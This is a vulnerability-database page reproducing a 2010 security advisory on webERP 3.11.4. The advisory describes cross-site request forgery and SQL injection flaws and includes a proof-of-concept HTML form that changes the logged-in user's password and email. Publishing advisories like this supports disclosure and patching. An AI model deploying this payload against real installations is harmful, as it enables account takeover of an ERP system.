Lucene search
K

webERP 3.11.4 Cross Site Request Forgery

🗓️ 01 Jul 2010 00:00:00Reported by ADEO SecurityType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 20 Views

webERP 3.11.4 Cross Site Request Forgery vulnerability, SQL Injection, and Po

Code
`  
  
# Title: webERP Multiple Vulnerabilities  
# Author: ADEO Security  
# Published: 30/06/2010  
# Version: 3.11.4 (Possible all versions)  
# Vendor: http://www.weberp.org  
  
# Description: "webERP is a complete web based accounting/ERP system  
that requires only a web-browser and pdf reader to use. It has a wide  
range of features suitable for many businesses particularly  
distributed businesses in wholesale and distribution. It is developed  
as an open-source application and is available as a free download to  
use. The feature set is continually expanding as new businesses and  
developers adopt it.There are on average 5,000 downloads per month."  
  
# Credit: Vulnerability founded by Canberk BOLAT at ADEO Security Labs  
- Mail: security[AT]adeo.com.tr  
- Web: http://security.adeo.com.tr  
  
# Vulnerabilities:  
1) CSRF: Attacker can add new administrator to the system. All files  
have this issue. See #PoC section.  
2) SQL Injection: Application offer disable the magic_quotes_gpc.  
Attacker can inject sql codes if exploit the CSRF vulnerability. HTTP  
Requests must filtered.  
  
# PoC (CSRF):  
<html>  
<body>  
<form method="POST" action="http://weberp.test/UserSettings.php?">  
<input type="hidden" name="RealName" VALUE="ADEO-Security">  
<input type='hidden' name='DisplayRecordsMax' VALUE="10">  
<input type='hidden' name='Language' VALUE='en_US'>  
<input type='hidden' name='Theme' VALUE='green'>  
<input type='hidden' name='pass' value='adeopass'>  
<input type='hidden' name='passcheck' value='adeopass'>  
<input type='hidden' name='email' size=40 value='[email protected]'>  
<input type='hidden' name='Modify' value="Modify""></div>  
</form>  
  
</body>  
</html>  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

01 Jul 2010 00:00Current
0.6Low risk
Vulners AI Score0.6
20